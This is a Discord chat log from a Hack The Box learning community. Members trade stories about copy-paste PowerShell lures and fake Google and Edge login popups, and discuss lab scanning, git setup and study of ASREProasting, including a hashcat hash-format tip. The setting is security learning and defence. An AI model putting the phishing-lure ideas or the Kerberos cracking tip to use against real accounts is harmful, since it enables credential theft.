molten bobcat
"this IP is not on our network"
muted olive
Investing in a good EDR
muted olive
Homie it signed in to your domain controller
probably just karen from HR
molten bobcat
Nah this is
Analysts who work there
Telling me this
Just as clueless as anyone
balmy basalt
Homie it signed in to your domain controller
Or is the DC public? π«
molten bobcat
I'm so fuckin tired of dcs being public bro
Why
Why would you do this
CUZ IT HAS A WEBSERVER
WHY
SAME QUESTION BRO
muted olive
They're public? π
molten bobcat
WHY WOULD YOU DO THIS
muted olive
Who the fuck runs a webserver on a DC?
drifting shoal
why hacknet doesn't work?
molten bobcat
You get trained to stop hackers and then it's the clients who are letting them the fuck in
muted olive
You get trained to stop hackers and then it's the clients who are letting them t...
Would these guys maybe run some "troubleshooting code" I guide them towards?
muted olive
if so I'm gonna have a fun time if I'm contracted by your company π€£
molten bobcat
Yes
muted olive
new stuff I havent really looked into
molten bobcat
Copy paste this malicious powershell into your terminal to verify you're a human
molten bobcat
also you'd have to be exceptionally dumb to believe that but whatever
It has an extremely high success rate
drifting shoal
I just started the box
muted olive
... ok that speaks volumes about the victims
molten bobcat
Correct most people are morons help 
muted olive
I recently found a domain used by some Chinese APT... and it was still active
I could use all the functionality lol
And you could blatantly tell it was attacker infra
molten bobcat
I try not to touch attacker infra if I can
balmy basalt
also you'd have to be exceptionally dumb to believe that but whatever
Not really. For most people, computers are magic dark boxes. Copy and post a line into this odd box doesn't sound that different from picking the image that is different or lining up the odd shapes, etc.
molten bobcat
They startle like pigeons
muted olive
It was fun to interact and see how they designed it.
They pulled the frontend from Facebook and it still had Meta's footers in it LOL
molten bobcat
Of course it does lmao
muted olive
Not really. For most people, computers are magic dark boxes. Copy and post a lin...
Fair enough
molten bobcat
They just copy paste it
drifting shoal
@ornate ibex
molten bobcat
muted olive
They just copy paste it
It also popped up an SSO login to perform some action like adding a calendar for a meeting, and it looked very very very similar to Google's login popup
nearly identical
molten bobcat
muted olive
except the forgot password and create new account buttons didnt work lmfao
but otherwise looks the same at first glance
muted olive
you enter your creds in the near identical google login, attacker connects and sends you an MFA prompt
drifting shoal
I can ping it but when i try to recon, it's looking like the machine is off
fiery copper
I can ping it but when i try to recon, it's looking like the machine is off
THEN TURN IT ON
muted olive
Cred stealer
I entered cutetryguys:butgitgudnexttime in the prompt and sent it
fiery copper
you can do it
drifting shoal
nmap 10.129.232.4
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 09:46 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds
drifting shoal
ping 10.129.2.251
PING 10.129.2.251 (10.129.2.251) 56(84) bytes of data.
64 bytes from 10.129.2.251: icmp_seq=1 ttl=63 time=45.0 ms
64 bytes from 10.129.2.251: icmp_seq=2 ttl=63 time=46.8 ms
64 bytes from 10.129.2.251: icmp_seq=3 ttl=63 time=46.2 ms
I usually enter gofuckyourself@domain.com
balmy basalt
```
nmap 10.129.232.4
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 09:...
You could try the flag listed right in the error since you know the machine is up.
drifting shoal
my bad
molten bobcat
Yeh not talking to you lentho
I was talking about what I put in cred stealer links to test them
I often like to tell attackers to go to hell
muted olive
Ironically the attacker is supposed to connect with you to send you the MFA prompt so the password you entered is still "processing"
molten bobcat
Mhm
muted olive
attacker didn't send me an MFA prompt though :(
molten bobcat
I had a phishing page that had web elements that mimicked a Microsoft edge popup window for creds
muted olive
they saw my password, I bet
muted olive
I had a phishing page that had web elements that mimicked a Microsoft edge popup...
Ngl, if I was relying purely on UI and comparison to regular functionality, I'd be fooled
I say this because I'd spot "off" elements in google but microsoft keeps updating their pages all the time
microslop
molten bobcat
I stared at it, and tried to click and drag the Microsoft edge window, WHICH WORKED
But it doesn't drag outside of the browser window
muted olive
I stared at it, and tried to click and drag the Microsoft edge window, WHICH WOR...
uh.. so? its just a popup
molten bobcat
Because it's part of the website
muted olive
you can drag popups
molten bobcat
It's not a popup
muted olive
oh π
molten bobcat
You're not understanding me
muted olive
my bad
molten bobcat
The site animated and programmed
A false window
That behaved like a normal window
Except it was part of the website
No popup
molten bobcat
It mimicked a Microsoft edge browser window
No they did nothing lmao
They highlighted on hover but no click functionality
muted olive
they shouldve tbh
molten bobcat
It's designed to be a cred stealer so it doesn't go away easy
muted olive
reminds me of https://youareanidiot.cc
to this day I don't know what this above thing did
or whatever that link is supposed to be
I forgot
molten bobcat
Does it bounce around and sing
past wigeon
I didn't ask chat gpt (because I hate AI and find more value in advice from lived experiences) but does anyone know if there's a way to have multiple ideally simultaneous connections to different GitHub accounts on terminal so you can make commits to diff repos associated with those separate accounts?
past wigeon
Does it bounce around and sing
No that was dancing hamster
molten bobcat
Sorry 2009-2012 era
YouAreAnIdiot | Malware Database Wikia | Fandom https://share.google/bSDPVGwOdiIqpKDp2
past wigeon
Oh. Lol
muted olive
Does it bounce around and sing
yeah, multiple popups open every second lol
molten bobcat
Yep
muted olive
I killed it with task manager
past wigeon
Ok I knew that one under a much different name
molten bobcat
It's using JavaScript to make the windows dance around
grizzled urchin
when does season 10 start
past wigeon
And different method of trolling
One that was likely to get you grounded if you were a kid
molten bobcat
Free cupholder executable that would open the CD tray
muted olive
It's using JavaScript to make the windows dance around
It is?
past wigeon
when does season 10 start
6-7 days
muted olive
I mean obviously it is but
molten bobcat
If you read the link I said
fiery copper
Free cupholder executable that would open the CD tray
I should do once a personal project of my own coffee maker
molten bobcat
It does mention it's a js trojan
grizzled urchin
6-7 days
awesome, appreciate the info. im getting decently far in my classes and im excited to keep the progress going
muted olive
This means I found something new to do with XSSes
This
past wigeon
This means I found something new to do with XSSes
Yeah don't do that unless you're I dunno... Not planning on securing a bounty for your efforts
muted olive
I'll try that out nxet time π€£
muted olive
Yeah don't do that unless you're I dunno... Not planning on securing a bounty fo...
Oh not in bug bounties lmao
past wigeon
awesome, appreciate the info. im getting decently far in my classes and im excit...
That was a joke. I just wanted to say six seven.
grizzled urchin
That was a joke. I just wanted to say six seven.
oh lol im old and unless your saying "IM RICK JAMES" or something i wont get it
molten bobcat
past wigeon
oh lol im old and unless your saying "IM RICK JAMES" or something i wont get it
Yeah that's my preferred meme as well. I'm just trying to kill the 67 meme. Doing my part as a millennial. Friend request incoming btw
balmy basalt
I didn't ask chat gpt (because I hate AI and find more value in advice from live...
You can set a git identity per repository.
grizzled urchin
Yeah that's my preferred meme as well. I'm just trying to kill the 67 meme. Doin...
gotchu big dog
molten bobcat
I've only ever seen a YouTube video of it lol
past wigeon
You can set a git identity per repository.
So it's kinda the same thing I'm talking about just from the "other direction"? You're commiter you want to stay anonymous or under an assumed name is set and you just keep one config set on git in term?
balmy basalt
So it's kinda the same thing I'm talking about just from the "other direction"? ...
Not specifically. IP address would still be consistent between all of them for example but you can set different accounts that way.
molten bobcat
Or it couldve been the other one with a "flipping sausage"
Pretty great
vital valley
Hi guys, Im beginner and was wonderying if you would recomend the tryhackme premium ? Im asking here because I guess perhaps some of you tried it and can give objective opinion. Thanks.
meager kernel
Hi guys, Im beginner and was wonderying if you would recomend the tryhackme pre...
HTB is better than THM
I am someone who did THM for 1 year and then moved to HTB
also THM was involved in many controversies regarding stealing user data and all
so i would recommend to stay away from them
molten bobcat
rustic carbon
hi
past wigeon
Not specifically. IP address would still be consistent between all of them for e...
Oh that's no problem. Appreciate the ace advice. Basically just do all my notes and rough drafts for box write ups on a GitHub account with a username that matches my discord name. This is the manner I spend most my time so it just makes sense. Now i need to write some code for my portfolio tho and I don't want a potential employer seeing some weird name that may not make sense to them and a daft punk pfp ya feel me?
past wigeon
also THM was involved in many controversies regarding stealing user data and all
Holy cow?
Let me guess nothing happened?
balmy basalt
Oh that's no problem. Appreciate the ace advice. Basically just do all my notes ...
Yep. And setting an identity per repository should work just fine for that.
past wigeon
Ah too easy then.
fiery copper
most beautiful women are those true to themselves
most beautiful men are those true to themselves
fiery copper
Ah too easy then.
sheesh bro is Megamind
fiery copper
mariodev rn
well people usually build their lives based on lies they told themselves
past wigeon
most beautiful men are those true to themselves
True. But inherently at odds with where we find ourselves as a global human community with social media hence the "why are there no more counter cultures" and "why is everyone all into the same stuff" YouTube videos
signal mica
well people usually build their lives based on lies they told themselves
excellent assesment
sturdy thistle
Woooooow im also there
zealous charm
Oh not in bug bounties lmao
Use the XSS confetti POC for your next BB XSS submission
fiery copper
yoo how did u get there
subtle plover
yoo how did u get there
I hacked the secret machine
cerulean bloom
why aint I there /j
scenic maple
wanton dock
stimming rn
mystic patio
raven rain
I even forgot which repo that is lol π
obsidian htb theme
fiery copper
lol HTB discord memebers
signal mica
past wigeon
lol HTB discord memebers
Hey that's me!
sturdy thistle
obsidian htb theme
Oh yeah ofc
ornate ibex
<@561210274653274133>
Yes?
subtle plover
everyone fell for it
molten bobcat
exotic pendant
π
Frosto dieting going better than expected
can already see striations in muscles
obtuse fern
I'm starting studying today
Study deez
meager kernel
Let me guess nothing happened?
nah the CEO of THM doubled down
wanton dock
is arc raiders any good
meager kernel
i need to buy battlefield 2042
battlefield 6 is better
wanton dock
oh shit yeah battlefield 6 my bad
i cant get over this it's so funny
i like battlebit remastered because it can feel like an actual battle where you have to work with your team in a more realistic sense. when i played battlefield 4 everyone was always on their own or with a designated squad
although this was over 10 years ago
lofty warren
wanton dock
had to get my morning stim in
fierce osprey
thank you for this advice
rapid badger
had to get my morning stim in
My good friend from the US once told me " America is about crushing a pill on a CD case and snorting it TO FEEL GOOD."
wanton dock
My good friend from the US once told me " America is about crushing a pill on a ...
i can confirm
mystic harbor
<a:ggwp_done:1424966424077799545>
β This user is banned from Discord, you can't see their message. Learn More
white trench
Write-up of this new-retired web challange in HTB
Web Cache Deception Exploitation | CDNio HTB
https://www.youtube.com/watch?v=3lb1SHWe8WU
wanton dock
molten bobcat
Same actually
Except in half an hour I begin studying
So I vibe for a little bit
molten bobcat
I unfortunately have to do it alone or I won't be as efficient as I'd like
wanton dock
that's alr
molten bobcat
I kinda have to sequester myself away to get shit done
wanton dock
same
wanton dock
ive got diet coke and an oven pizza
im honestly so bored dude
i dont understand why i dont just do academy or read
i used to love reading
molten bobcat
I've found that feeling bored goes away now that I'm on ADHD meds
I'm pretty good at finding something to do now
wanton dock
when did you start them? recently?
molten bobcat
Few months ago
lofty warren
wanton dock
wanton dock
Eh I've made valid genuine connections
same its just more often than not i find myself shitposting instead of making actual dialogue
genuine issue
when i first started adhd meds i was a bullet
it's been a few years now though
molten bobcat
I try not to focus on what it can do for my productivity
Because I don't give a fuck about that
I care about whether or not I can keep my emotions in check or wake up without anxiety
wanton dock
that's valid
time to put myself in my place, retreat into my cave with a single ethernet cable inside of it i dug out of the ground, connected to an super thin office desktop full of dust, and do htb academy
π«‘
i'm going in
pray for me
supple plume
head /usr/share/seclists/Miscellaneous/List-Of-Swear-Words/en.txt -n281 | tail -n1
supple plume
if you use wordlists you still have [REDACTED] in your computer
zealous charm
Eh I've made valid genuine connections
You can also land jobs through discord, so itβs worth making those connections
lofty warren
heady sage
<a:petthebuddy:809447738596655104> <a:petthebuddy:809447738596655104> <a:pettheb...
Congrats on CWES!
Very proud of you
undone fossil
<a:petthebuddy:809447738596655104> <a:petthebuddy:809447738596655104> <a:pettheb...
Ayo buddy?
lofty warren
Ayo buddy?
pet the buddy
lofty warren
Congrats on CWES!
tysmmmm
undone fossil
I will give him extra pets the next time I see him
knotty oar
Hello folx!
undone fossil
Good frogs
scenic maple
I don't understand I'm just trying to be friendly
frog gif was for froj
lofty warren
I don't understand I'm just trying to be friendly
scenic maple
welcome to htb
knotty oar
frog gif was for froj
I understand I was just surprised with people in the chat that no one replied
knotty oar
welcome to htb
Thanks, I actually got pretty far with the old website layout but everything looks much more polished now
sturdy thistle
static pasture
You can also land jobs through discord, so itβs worth making those connections
. Can confirm
undone fossil
Imagine being briish
static pasture
Imagine being briish
What's a Briish. That like a food /s
undone fossil
Ye kinda itβs a weird form of ration actually
static pasture
Yo
undone fossil
Studying for?
molten bobcat
so current subject is understanding windows attacks
at the moment its ASREProasting
undone fossil
Nice
molten bobcat
the CDSA is pretty nice content wise
they make you commit the attack
and then review the logs that attack typically generates
undone fossil
Ye itβs basically a practice lab right
Learning Kerberos and smb will be super useful though
molten bobcat
got a question you might be able to answer about hashcat
molten bobcat
For hashcat to be able to recognize the hash, we need to edit it by adding 23$ after $krb5asrep$:
Why do we do this? it doesn't explain why
undone fossil
Because thatβs the format on the hashcat wiki
undone fossil
molten bobcat
is this just from how rubeus outputs it or..?
undone fossil
Yes
scenic maple
Completed another [module](https://academy.hackthebox.com/achievement/752428/pat...
finally getting started in htb?
ornate ibex
finally getting started in htb?
Yes. on my way to CWES
completed 35.48% in the path
should complete two or three modules tomw
undone fossil
Honestly if I could skip the βpathsβ Iβd do Htb exams
scenic maple
dont u get stuck on assesments?